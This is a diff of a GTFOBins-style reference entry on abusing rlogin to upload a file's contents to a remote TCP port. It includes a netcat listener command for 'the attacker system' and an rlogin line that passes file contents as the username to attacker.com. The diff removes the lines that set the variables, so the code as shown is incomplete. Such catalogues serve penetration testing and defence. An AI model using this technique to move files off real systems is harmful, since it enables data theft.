GTFOud/GTFOud.github.io/_gtfoud/rlogin.md

 functions:
   file-upload:
     - description: |
         Send contents of a file to a TCP port.
-Run `nc -l -p 12345 > "file_to_save"` on the attacker system to capture the contents.
+Run `nc -l -p 4444 > "file_to_save"` on the attacker system to capture the contents.

         `rlogin` hangs waiting for the remote peer to close the socket.

         The file is corrupted by leading and trailing spurious data.
       code: |
-        RHOST=attacker.com
-        RPORT=12345
-        LFILE=file_to_send
         rlogin -l "$(cat $LFILE)" -p $RPORT $RHOST
 ---